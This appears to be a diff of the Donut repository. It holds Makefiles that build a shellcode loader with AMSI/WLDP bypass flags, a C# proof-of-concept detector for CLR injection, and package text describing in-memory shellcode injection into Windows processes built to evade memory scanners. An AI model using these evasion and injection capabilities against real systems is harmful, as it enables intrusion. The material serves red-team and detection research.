1 CC64 := x86_64-w64-mingw32-gcc
2
3 donut: clean
4 $(info ###### RELEASE ######)
5 gcc -I include loader/exe2h/exe2h.c -oexe2h
6 $(CC64) -I include loader/exe2h/exe2h.c loader/exe2h/mmap-windows.c -lshlwapi -oexe2h.exe
7
8 $(CC32) -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib loader/loader.c loader/depack.c loader/clib.c hash.c encrypt.c -I include -oloader.exe
9 ./exe2h loader.exe
10
11 $(CC64) -DBYPASS_AMSI_A -DBYPASS_WLDP_A -fno-toplevel-reorder -fpack-struct=8 -fPIC -O0 -nostdlib loader/loader.c loader/depack.c loader/clib.c hash.c encrypt.c -I include -oloader.exe
12 ./exe2h loader.exe
13
14 $(CC64) -Wall -fpack-struct=8 -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader/clib.c lib/aplib64.lib -odonut.exe
15 debug: clean
16 $(info ###### DEBUG ######)
17 $(CC32) -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I include loader/loader.c hash.c encrypt.c loader/depack.c loader/clib.c -oloader32.exe -lole32 -lshlwapi
18 $(CC64) -DCLIB -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Wno-format -fpack-struct=8 -DDEBUG -I include loader/loader.c hash.c encrypt.c loader/depack.c loader/clib.c -oloader64.exe -lole32 -lshlwapi
19 $(CC64) -Wall -Wno-format -fpack-struct=8 -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader/clib.c lib/aplib64.lib -odonut.exe
420 clean:
5 rm donut.exe *.o
21 rm -f exe2h exe2h.exe loader.bin instance donut.o hash.o encrypt.o format.o clib.o hash encrypt donut hash.exe encrypt.exe donut.exe lib/libdonut.a lib/libdonut.so loader.exe loader32.exe loader64.exe
+30
-13
Makefile.msvc less more
0 donut:
1 cl -Zp8 -nologo -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c
2 cl -Zp8 -nologo -DDLL -LD -I include donut.c hash.c encrypt.c payload/clib.c
3 move donut.lib lib/donut.lib
4 move donut.exp lib/donut.exp
5 move donut.dll lib/donut.dll
6 debug:
7 cl -Zp8 -nologo -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c payload/clib.c
8 cl -Zp8 -nologo -DDEBUG -DDLL -LD -I include donut.c hash.c encrypt.c payload/clib.c
9 move donut.lib lib/donut.lib
10 move donut.exp lib/donut.exp
11 move donut.dll lib/donut.dll
0 donut: clean
1 @echo ###### Building exe2h ######
2 cl /nologo loader\exe2h\exe2h.c loader\exe2h\mmap-windows.c
3
4 @echo ###### Building loader ######
5 cl -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -O1 -GR- -EHa -Oi -GS- -I include loader\loader.c hash.c encrypt.c loader\depack.c loader\clib.c
6 link -nologo -order:@loader\order.txt -entry:DonutLoader -fixed -subsystem:console -nodefaultlib loader.obj hash.obj encrypt.obj depack.obj clib.obj
7 exe2h loader.exe
8
9 @echo ###### Building generator ######
10 rc include/donut.rc
11 cl -Zp8 -nologo -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader\clib.c lib\aplib64.lib include/donut.res
12 cl -Zp8 -nologo -DDLL -LD -I include donut.c hash.c encrypt.c format.c loader\clib.c lib\aplib64.lib
13 move donut.lib lib\donut.lib
14 move donut.exp lib\donut.exp
15 move donut.dll lib\donut.dll
16 debug: clean
17 cl /nologo -DDEBUG -DBYPASS_AMSI_A -DBYPASS_WLDP_A -Zp8 -c -nologo -Gy -Os -EHa -GS- -I include loader/loader.c hash.c encrypt.c loader/depack.c loader/clib.c
18 link -nologo -order:@loader\order.txt -subsystem:console loader.obj hash.obj encrypt.obj depack.obj clib.obj
19
20 cl -Zp8 -nologo -DDEBUG -DDONUT_EXE -I include donut.c hash.c encrypt.c format.c loader\clib.c lib\aplib64.lib
21 cl -Zp8 -nologo -DDEBUG -DDLL -LD -I include donut.c hash.c encrypt.c format.c loader\clib.c lib\aplib64.lib
22 move donut.lib lib\donut.lib
23 move donut.exp lib\donut.exp
24 move donut.dll lib\donut.dll
25 hash:
26 cl -Zp8 -nologo -DTEST -I include hash.c loader\clib.c
27 encrypt:
28 cl -Zp8 -nologo -DTEST -I include encrypt.c
1229 clean:
13 del *.obj *.bin donut.exe lib/donut.exp lib/donut.lib lib/donut.dll
30 @del /Q mmap-windows.obj donut.obj hash.obj encrypt.obj depack.obj format.obj clib.obj hash.exe encrypt.exe donut.exe lib\libdonut.lib lib\libdonut.dll
+29
-0
ModuleMonitor/LICENSE less more
0 BSD 3-Clause License
1
2 Copyright (c) 2019, TheWover
3 All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 1. Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 2. Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 3. Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+58
-0
ModuleMonitor/ModuleMonitor.csproj less more
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <Import Project="$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props" Condition="Exists('$(MSBuildExtensionsPath)\$(MSBuildToolsVersion)\Microsoft.Common.props')" />
3 <PropertyGroup>
4 <Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
5 <Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
6 <ProjectGuid>{361C69F5-7885-4931-949A-B91EEAB170E3}</ProjectGuid>
7 <OutputType>Exe</OutputType>
8 <RootNamespace>ModuleMonitor</RootNamespace>
9 <AssemblyName>ModuleMonitor</AssemblyName>
10 <TargetFrameworkVersion>v4.7.2</TargetFrameworkVersion>
11 <FileAlignment>512</FileAlignment>
12 <Deterministic>true</Deterministic>
13 <TargetFrameworkProfile />
14 </PropertyGroup>
15 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
16 <PlatformTarget>AnyCPU</PlatformTarget>
17 <DebugSymbols>true</DebugSymbols>
18 <DebugType>full</DebugType>
19 <Optimize>false</Optimize>
20 <OutputPath>bin\Debug\</OutputPath>
21 <DefineConstants>DEBUG;TRACE</DefineConstants>
22 <ErrorReport>prompt</ErrorReport>
23 <WarningLevel>4</WarningLevel>
24 <Prefer32Bit>false</Prefer32Bit>
25 </PropertyGroup>
26 <PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Release|AnyCPU' ">
27 <PlatformTarget>AnyCPU</PlatformTarget>
28 <DebugType>pdbonly</DebugType>
29 <Optimize>true</Optimize>
30 <OutputPath>bin\Release\</OutputPath>
31 <DefineConstants>TRACE</DefineConstants>
32 <ErrorReport>prompt</ErrorReport>
33 <WarningLevel>4</WarningLevel>
34 <Prefer32Bit>false</Prefer32Bit>
35 </PropertyGroup>
36 <PropertyGroup>
37 <ApplicationManifest>app.manifest</ApplicationManifest>
38 </PropertyGroup>
39 <ItemGroup>
40 <Reference Include="System" />
41 <Reference Include="System.Core" />
42 <Reference Include="System.Management" />
43 <Reference Include="System.Xml.Linq" />
44 <Reference Include="System.Data.DataSetExtensions" />
45 <Reference Include="System.Data" />
46 <Reference Include="System.Xml" />
47 </ItemGroup>
48 <ItemGroup>
49 <Compile Include="Program.cs" />
50 <Compile Include="Properties\AssemblyInfo.cs" />
51 </ItemGroup>
52 <ItemGroup>
53 <None Include="app.config" />
54 <None Include="app.manifest" />
55 </ItemGroup>
56 <Import Project="$(MSBuildToolsPath)\Microsoft.CSharp.targets" />
57 </Project>
+6
-0
ModuleMonitor/ModuleMonitor.csproj.user less more
0 <?xml version="1.0" encoding="utf-8"?>
1 <Project ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
2 <PropertyGroup Condition="'$(Configuration)|$(Platform)' == 'Debug|AnyCPU'">
3 <StartArguments>--clr-sentry</StartArguments>
4 </PropertyGroup>
5 </Project>
+25
-0
ModuleMonitor/ModuleMonitor.sln less more
0 
1 Microsoft Visual Studio Solution File, Format Version 12.00
2 # Visual Studio 15
3 VisualStudioVersion = 15.0.28307.136
4 MinimumVisualStudioVersion = 10.0.40219.1
5 Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "ModuleMonitor", "ModuleMonitor.csproj", "{361C69F5-7885-4931-949A-B91EEAB170E3}"
6 EndProject
7 Global
8 GlobalSection(SolutionConfigurationPlatforms) = preSolution
9 Debug|Any CPU = Debug|Any CPU
10 Release|Any CPU = Release|Any CPU
11 EndGlobalSection
12 GlobalSection(ProjectConfigurationPlatforms) = postSolution
13 {361C69F5-7885-4931-949A-B91EEAB170E3}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
14 {361C69F5-7885-4931-949A-B91EEAB170E3}.Debug|Any CPU.Build.0 = Debug|Any CPU
15 {361C69F5-7885-4931-949A-B91EEAB170E3}.Release|Any CPU.ActiveCfg = Release|Any CPU
16 {361C69F5-7885-4931-949A-B91EEAB170E3}.Release|Any CPU.Build.0 = Release|Any CPU
17 EndGlobalSection
18 GlobalSection(SolutionProperties) = preSolution
19 HideSolutionNode = FALSE
20 EndGlobalSection
21 GlobalSection(ExtensibilityGlobals) = postSolution
22 SolutionGuid = {B18C8887-D713-4379-A365-35C9C89A1C36}
23 EndGlobalSection
24 EndGlobal
+352
-0
ModuleMonitor/Program.cs less more
0 /* Name: ModuleMonitor
1 *
2 *
3 *
4 *
5 *
6 *
7 */
8
9 using System;
10 using System.Linq;
11 using System.Collections.Generic;
12 using System.Diagnostics;
13 using System.Management;
14 using System.Runtime.InteropServices;
15 using System.Security.Principal;
16
17 namespace CLRSentry
18 {
19 class Program
20 {
21 //TODO: Rename projec to ModuleMonitor, and add a --clrssentry option to watch for CLR injection
22 static void Main(string[] args)
23 {
24 if (args.Contains("-h") || args.Contains("--help"))
25 {
26 PrintUsage();
27
28 Environment.Exit(0);
29 }
30
31
32 if (args.Contains("--clr-sentry"))
33 {
34 CLRSentry();
35 }
36 else
37 {
38
39 MonitorModuleLoads();
40
41 }
42 }
43
44 /// <summary>
45 /// Monitor for module loads using the WMI Event Win32_ModuleLoadTrace.
46 /// </summary>
47 public static void MonitorModuleLoads()
48 {
49 //Monitor without any filters
50 MonitorModuleLoads(new List<string>());
51 }
52
53 /// <summary>
54 /// Struct representing the WMI class Win32_ModuleLoadTrace
55 /// </summary>
56 [StructLayout(LayoutKind.Sequential)]
57 public struct Win32_ModuleLoadTrace
58 {
59 public sbyte[] SECURITY_DESCRIPTOR;
60 public UInt64 TIME_CREATED;
61 public string FileName;
62 public UInt64 DefaultBase;
63 public UInt64 ImageBase;
64 public UInt32 ImageChecksum;
65 public UInt64 ImageSize;
66 public UInt32 ProcessID;
67 public UInt32 TimeDateSTamp;
68 }
69
70
71 /// <summary>
72 /// Overload of GetNextModuleLoad that does not require filters.
73 /// </summary>
74 /// <returns></returns>
75 public static Win32_ModuleLoadTrace GetNextModuleLoad()
76 {
77 return GetNextModuleLoad(new List<string>());
78 }
79
80
81 /// <summary>
82 /// Get the details of the next module load
83 /// </summary>
84 /// <param name="filters">Filenames to filter for.</param>
85 /// <returns></returns>
86 public static Win32_ModuleLoadTrace GetNextModuleLoad(List<string> filters)
87 {
88 Win32_ModuleLoadTrace trace = new Win32_ModuleLoadTrace();
89
90 //Ideally, we would filter here to reduce the amount of events that we have to consume.
91 //However, we cannot use the WHERE clause because the
92 var startWatch = new ManagementEventWatcher(new WqlEventQuery("SELECT * FROM Win32_ModuleLoadTrace"));
93
94 ManagementBaseObject e = startWatch.WaitForNextEvent();
95
96 //Instead, we filter here, because it's easy and we're a bit lazy
97 if (filters.Count == 0 ^ filters.Contains(((ManagementBaseObject)e)["FileName"].ToString()))
98 {
99 if (((ManagementBaseObject)e)["SECURITY_DESCRIPTOR"] != null)
100 trace.SECURITY_DESCRIPTOR = (sbyte[])((ManagementBaseObject)e)["SECURITY_DESCRIPTOR"];
101
102 if (((ManagementBaseObject)e)["TIME_CREATED"] != null)
103 trace.TIME_CREATED = (UInt64)((ManagementBaseObject)e)["TIME_CREATED"];
104
105 if (((ManagementBaseObject)e)["FileName"] != null)
106 trace.FileName = (string)((ManagementBaseObject)e)["FileName"];
107
108 if (((ManagementBaseObject)e)["DefaultBase"] != null)
109 trace.DefaultBase = (UInt64)((ManagementBaseObject)e)["DefaultBase"];
110
111 if (((ManagementBaseObject)e)["ImageBase"] != null)
112 trace.ImageBase = (UInt64)((ManagementBaseObject)e)["ImageBase"];
113
114 if (((ManagementBaseObject)e)["ImageChecksum"] != null)
115 trace.ImageChecksum = (UInt32)((ManagementBaseObject)e)["ImageChecksum"];
116
117 if (((ManagementBaseObject)e)["ImageSize"] != null)
118 trace.ImageSize = (UInt64)((ManagementBaseObject)e)["ImageSize"];
119
120 if (((ManagementBaseObject)e)["ProcessID"] != null)
121 trace.ProcessID = (UInt32)((ManagementBaseObject)e)["ProcessID"];
122
123 if (((ManagementBaseObject)e)["TimeDateSTamp"] != null)
124 trace.TimeDateSTamp = (UInt32)((ManagementBaseObject)e)["TimeDateSTamp"];
125
126 return trace;
127 }
128 else
129 return trace;
130 }
131
132 public static void CLRSentry()
133 {
134 //Sentries never sleep.
135 //UCMJ Article 113
136 /* Any sentinel or look-out who is found drunk or sleeping upon his post,
137 * or leaves it before he is regularly relieved, shall be punished,
138 * if the offense is committed in time of war, by death or such other punishment as a court-martial may direct,
139 * by if the offense is committed at any other time,
140 * by such punishment other than death as court-martial may direct.
141 */
142 while (true)
143 {
144 //Get the module load.
145 Win32_ModuleLoadTrace trace = GetNextModuleLoad();
146
147 //Split the
148 string[] parts = trace.FileName.Split('\\');
149
150 //Check whether it is a .NET Runtime DLL
151 if (parts[parts.Length - 1].Contains("msco"))
152 {
153 Process proc = Process.GetProcessById((int) trace.ProcessID);
154
155 //Check if the file is a .NET Assembly
156 if (!IsValidAssembly(proc.StartInfo.FileName))
157 {
158 //If it is not, then the CLR has been injected.
159 Console.WriteLine();
160
161 Console.WriteLine("[!] CLR Injection has been detected!");
162
163 //Display information from the event
164 Console.WriteLine("[>] Process {0} has loaded the CLR but is not a .NET Assembly:", trace.ProcessID);
165 Console.WriteLine("{0,15} Win32_ModuleLoadTrace:", "[!]");
166
167 DateTime time = new DateTime();
168 DateTime.TryParse(trace.TIME_CREATED.ToString(), out time);
169 time.ToLocalTime();
170
171 //TODO: Time is printing strangley
172 Console.WriteLine("{0,15} (Event) TIME_CREATED: {1}", "[+]", time.ToString());
173 //TODO: Convert to hex
174 Console.WriteLine("{0,15} (Process) ImageBase: {1}", "[+]", trace.ImageBase);
175 Console.WriteLine("{0,15} (Process) DefaultBase: {1}", "[+]", trace.DefaultBase);
176 Console.WriteLine("{0,15} (Module) FileName: {1}", "[+]", trace.FileName);
177 Console.WriteLine("{0,15} (Module) TimeStamp: {1}", "[+]", trace.TimeDateSTamp);
178 Console.WriteLine("{0,15} (Module) ImageSize: {1}", "[+]", trace.ImageSize);
179 Console.WriteLine("{0,15} (Module) ImageChecksum: {1}", "[+]", trace.ImageChecksum);
180
181 Console.WriteLine("{0,15} Additional Information:", "[>]");
182
183 Process process = SafeGetProcessByID(int.Parse(trace.ProcessID.ToString()));
184
185 if (process != null)
186 {
187
188 Console.WriteLine("{0,30} Process Name: {1}", "[+]", process.ProcessName);
189 Console.WriteLine("{0,30} Process User: {1}", "[+]", GetProcessUser(process));
190 }
191 }
192 }
193 }
194 }
195
196 /// <summary>
197 /// Check if the file is a .NET Assembly by cheating and using the Reflection API's PE Parser.
198 ///
199 /// https://stackoverflow.com/questions/36797939/how-to-test-whether-a-file-is-a-net-assembly-in-c-sharp
200 /// </summary>
201 /// <param name="path">The file to check</param>
202 /// <returns>True if a .NET Assembly, false if not. Hopefully.</returns>
203 public static bool IsValidAssembly(string path)
204 {
205 try
206 {
207 // Attempt to resolve the assembly
208 var assembly = System.Reflection.AssemblyName.GetAssemblyName(path);
209 // Nothing blew up, so it's an assembly
210 return true;
211 }
212 catch (Exception ex)
213 {
214 // Something went wrong, it is not an assembly (specifically a
215 // BadImageFormatException will be thrown if it could be found
216 // but it was NOT a valid assembly
217 return false;
218 }
219 }
220
221
222 /// <summary>
223 /// Monitor for module loads using the WMI Event Win32_ModuleLoadTrace. Optionally filter by module names.
224 /// </summary>
225 /// <param name="filters">A list of module names to filter for.</param>
226 public static void MonitorModuleLoads(List<string> filters)
227 {
228 Console.WriteLine("Monitoring Win32_ModuleLoadTrace...\n");
229
230 while (true)
231 {
232 Win32_ModuleLoadTrace trace = new Win32_ModuleLoadTrace();
233 Win32_ModuleLoadTrace tracecomp = new Win32_ModuleLoadTrace();
234
235 //Get the details of the next module load
236 trace = GetNextModuleLoad(filters);
237
238 //If the trace is not empty
239 if (!trace.Equals(tracecomp))
240 {
241 Console.WriteLine();
242
243 //Display information from the event
244 Console.WriteLine("[>] Process {0} has loaded a module:", trace.ProcessID);
245 Console.WriteLine("{0,15} Win32_ModuleLoadTrace:", "[!]");
246
247 DateTime time = new DateTime();
248 DateTime.TryParse(trace.TIME_CREATED.ToString(), out time);
249 time.ToLocalTime();
250
251 //TODO: Time is printing strangley
252 Console.WriteLine("{0,15} (Event) TIME_CREATED: {1}", "[+]", time.ToString());
253 //TODO: Convert to hex
254 Console.WriteLine("{0,15} (Process) ImageBase: {1}", "[+]", trace.ImageBase);
255 Console.WriteLine("{0,15} (Process) DefaultBase: {1}", "[+]", trace.DefaultBase);
256 Console.WriteLine("{0,15} (Module) FileName: {1}", "[+]", trace.FileName);
257 Console.WriteLine("{0,15} (Module) TimeStamp: {1}", "[+]", trace.TimeDateSTamp);
258 Console.WriteLine("{0,15} (Module) ImageSize: {1}", "[+]", trace.ImageSize);
259 Console.WriteLine("{0,15} (Module) ImageChecksum: {1}", "[+]", trace.ImageChecksum);
260
261 Console.WriteLine("{0,15} Additional Information:", "[>]");
262
263 Process process = SafeGetProcessByID(int.Parse(trace.ProcessID.ToString()));
264
265 if (process != null)
266 {
267
268 Console.WriteLine("{0,30} Process Name: {1}", "[+]", process.ProcessName);
269 Console.WriteLine("{0,30} Process User: {1}", "[+]", GetProcessUser(process));
270 }
271 }
272 }
273 }
274
275 [DllImport("advapi32.dll", SetLastError = true)]
276 private static extern bool OpenProcessToken(IntPtr ProcessHandle, uint DesiredAccess, out IntPtr TokenHandle);
277 [DllImport("kernel32.dll", SetLastError = true)]
278 [return: MarshalAs(UnmanagedType.Bool)]
279 private static extern bool CloseHandle(IntPtr hObject);
280
281 /// <summary>
282 /// Gets the owner of a process.
283 ///
284 /// https://stackoverflow.com/questions/777548/how-do-i-determine-the-owner-of-a-process-in-c
285 /// </summary>
286 /// <param name="process">The process to inspect.</param>
287 /// <returns>The name of the user, or null if it could not be read.</returns>
288 public static string GetProcessUser(Process process)
289 {
290 IntPtr processHandle = IntPtr.Zero;
291 try
292 {
293 OpenProcessToken(process.Handle, 8, out processHandle);
294 WindowsIdentity wi = new WindowsIdentity(processHandle);
295 return wi.Name;
296 }
297 catch (Exception ex)
298 {
299 return ex.Message;
300 }
301 finally
302 {
303 if (processHandle != IntPtr.Zero)
304 {
305 CloseHandle(processHandle);
306 }
307 }
308 }//end method
309
310
311 /// <summary>
312 /// Try to get the process by ID and return null if it no longer exists.
313 /// </summary>
314 /// <param name="id"></param>
315 /// <returns></returns>
316 private static Process SafeGetProcessByID(int id)
317 {
318 try
319 {
320 return Process.GetProcessById(id);
321
322 }
323 catch
324 {
325 return null;
326 }
327 }
328
329 private static void PrintUsage()
330 {
331 Console.WriteLine();
332 Console.WriteLine("| Module Monitor [v0.1]");
333 Console.WriteLine("| Copyright (c) 2019 TheWover");
334 Console.WriteLine();
335
336 Console.WriteLine("Usage: ModuleMonitor.exe [--clr-sentry]");
337 Console.WriteLine();
338
339 Console.WriteLine("{0,-5} {1,-20} {2}", "", "-h, --help", "Display this help menu.");
340 Console.WriteLine("{0,-5} {1,-20} {2}", "", "--clr-sentry", "Monitor for CLR injection.");
341 Console.WriteLine();
342
343 Console.WriteLine("Examples:");
344 Console.WriteLine();
345
346 Console.WriteLine("ModuleMonitor.exe");
347 Console.WriteLine("ModuleMonitor.exe --clr-monitor");
348 Console.WriteLine();
349 }
350 }//end class
351 }//end namespace
+36
-0
ModuleMonitor/Properties/AssemblyInfo.cs less more
0 using System.Reflection;
1 using System.Runtime.CompilerServices;
2 using System.Runtime.InteropServices;
3
4 // General Information about an assembly is controlled through the following
5 // set of attributes. Change these attribute values to modify the information
6 // associated with an assembly.
7 [assembly: AssemblyTitle("ModuleMonitor")]
8 [assembly: AssemblyDescription("")]
9 [assembly: AssemblyConfiguration("")]
10 [assembly: AssemblyCompany("")]
11 [assembly: AssemblyProduct("ModuleMonitor")]
12 [assembly: AssemblyCopyright("Copyright © 2019")]
13 [assembly: AssemblyTrademark("")]
14 [assembly: AssemblyCulture("")]
15
16 // Setting ComVisible to false makes the types in this assembly not visible
17 // to COM components. If you need to access a type in this assembly from
18 // COM, set the ComVisible attribute to true on that type.
19 [assembly: ComVisible(false)]
20
21 // The following GUID is for the ID of the typelib if this project is exposed to COM
22 [assembly: Guid("361c69f5-7885-4931-949a-b91eeab170e3")]
23
24 // Version information for an assembly consists of the following four values:
25 //
26 // Major Version
27 // Minor Version
28 // Build Number
29 // Revision
30 //
31 // You can specify all the values or you can default the Build and Revision Numbers
32 // by using the '*' as shown below:
33 // [assembly: AssemblyVersion("1.0.*")]
34 [assembly: AssemblyVersion("1.0.0.0")]
35 [assembly: AssemblyFileVersion("1.0.0.0")]
+26
-0
ModuleMonitor/README.md less more
0 # ModuleMonitor
1
2 Has its own repo at: https://github.com/TheWover/ModuleMonitor
3
4 Uses WMI Event Win32_ModuleLoadTrace to monitor module loading. Provides filters, and detailed data. Has an option to monitor for CLR Injection attacks.
5
6 The CLR Sentry option follows some simple logic: If a process loads the CLR, but the program is not a .NET program, then the CLR has been injected into it.
7
8 While useful, there are both false positives and false negatives:
9
10 * False Postiive: There are (few) legitimate uses of the Unmanaged CLR Hosting API. If there weren't, then Microsoft wouldn't have made it. CLR Sentry will notice every unmanaged program that loads the CLR.
11 * False Negatives: This will NOT notice injection of .NET code into processes that already have the CLR loaded. So, no use of the Reflection API and not when donut is used to inject shellcode into managed processes.
12
13 Please Note: This is intended only as a Proof-of-Concept to demonstrate the anomalous behavior produced by CLR injection and how it may be detected. It should not be used in any way in a production environment. You perform the same logic with the ``` Image Load ``` event for Sysmon or ETW. They would be easier to scale and integrate with enterprise tooling.
14
15 ![Alt text](https://github.com/TheWover/donut/blob/master/ModuleMonitor/img/detected.png?raw=true "CLR Sentry detection")
16
17 # Usage
18
19 ```
20 | Module Monitor [v0.1]
21 | Copyright (c) 2019 TheWover
22
23 Usage: ModuleMonitor.exe [--clr-sentry]
24
25 ```
+3
-0
ModuleMonitor/app.config less more
0 <?xml version="1.0" encoding="utf-8"?>
1 <configuration>
2 <startup><supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.7.2"/></startup></configuration>
+76
-0
ModuleMonitor/app.manifest less more
0 <?xml version="1.0" encoding="utf-8"?>
1 <assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v1">
2 <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
3 <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
4 <security>
5 <requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
6 <!-- UAC Manifest Options
7 If you want to change the Windows User Account Control level replace the
8 requestedExecutionLevel node with one of the following.
9
10 <requestedExecutionLevel level="asInvoker" uiAccess="false" />
11 <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
12 <requestedExecutionLevel level="highestAvailable" uiAccess="false" />
13
14 Specifying requestedExecutionLevel element will disable file and registry virtualization.
15 Remove this element if your application requires this virtualization for backwards
16 compatibility.
17 -->
18 <requestedExecutionLevel level="requireAdministrator" uiAccess="false" />
19 </requestedPrivileges>
20 </security>
21 </trustInfo>
22
23 <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
24 <application>
25 <!-- A list of the Windows versions that this application has been tested on
26 and is designed to work with. Uncomment the appropriate elements
27 and Windows will automatically select the most compatible environment. -->
28
29 <!-- Windows Vista -->
30 <!--<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}" />-->
31
32 <!-- Windows 7 -->
33 <!--<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}" />-->
34
35 <!-- Windows 8 -->
36 <!--<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}" />-->
37
38 <!-- Windows 8.1 -->
39 <!--<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}" />-->
40
41 <!-- Windows 10 -->
42 <!--<supportedOS Id="{8e0f7a12-bfb3-4fe8-b9a5-48fd50a15a9a}" />-->
43
44 </application>
45 </compatibility>
46
47 <!-- Indicates that the application is DPI-aware and will not be automatically scaled by Windows at higher
48 DPIs. Windows Presentation Foundation (WPF) applications are automatically DPI-aware and do not need
49 to opt in. Windows Forms applications targeting .NET Framework 4.6 that opt into this setting, should
50 also set the 'EnableWindowsFormsHighDpiAutoResizing' setting to 'true' in their app.config. -->
51 <!--
52 <application xmlns="urn:schemas-microsoft-com:asm.v3">
53 <windowsSettings>
54 <dpiAware xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
55 </windowsSettings>
56 </application>
57 -->
58
59 <!-- Enable themes for Windows common controls and dialogs (Windows XP and later) -->
60 <!--
61 <dependency>
62 <dependentAssembly>
63 <assemblyIdentity
64 type="win32"
65 name="Microsoft.Windows.Common-Controls"
66 version="6.0.0.0"
67 processorArchitecture="*"
68 publicKeyToken="6595b64144ccf1df"
69 language="*"
70 />
71 </dependentAssembly>
72 </dependency>
73 -->
74
75 </assembly>
ModuleMonitor/img/detected.png less more
Binary diff not shown
+0
-264
PKG-INFO less more
0 Metadata-Version: 2.1
1 Name: donut-shellcode
2 Version: 0.9.2
3 Summary: Donut Python C extension
4 Home-page: https://github.com/TheWover/donut
5 Author: TheWover, Odzhan, byt3bl33d3r
6 License: UNKNOWN
7 Description: # Using Donut
8
9 ![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")
10
11 Version: 0.9.2 *please submit issues and requests for v1.0 release*
12
13 Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/
14
15 TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/
16
17 v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/
18
19 ## Introduction
20
21 Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) and XSL files. This shellcode can be injected into an arbitrary Windows processes for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.
22
23 It can be used in several ways.
24
25 ## As a Standalone Tool
26
27 Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL/XSL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for payload generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.
28
29 ```
30
31 usage: donut [options] -f <EXE/DLL/VBS/JS/XSL>
32
33 -MODULE OPTIONS-
34
35 -f <path> .NET assembly, EXE, DLL, VBS, JS or XSL file to execute in-memory.
36 -u <URL> HTTP server that will host the donut module.
37
38 -PIC/SHELLCODE OPTIONS-
39
40 -a <arch> Target architecture : 1=x86, 2=amd64, 3=amd64+x86(default).
41 -b <level> Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
42 -o <payload> Output file. Default is "payload.bin"
43
44 -DOTNET OPTIONS-
45
46 -c <namespace.class> Optional class name. (required for .NET DLL)
47 -m <method | api> Optional method or API name for DLL. (method is required for .NET DLL)
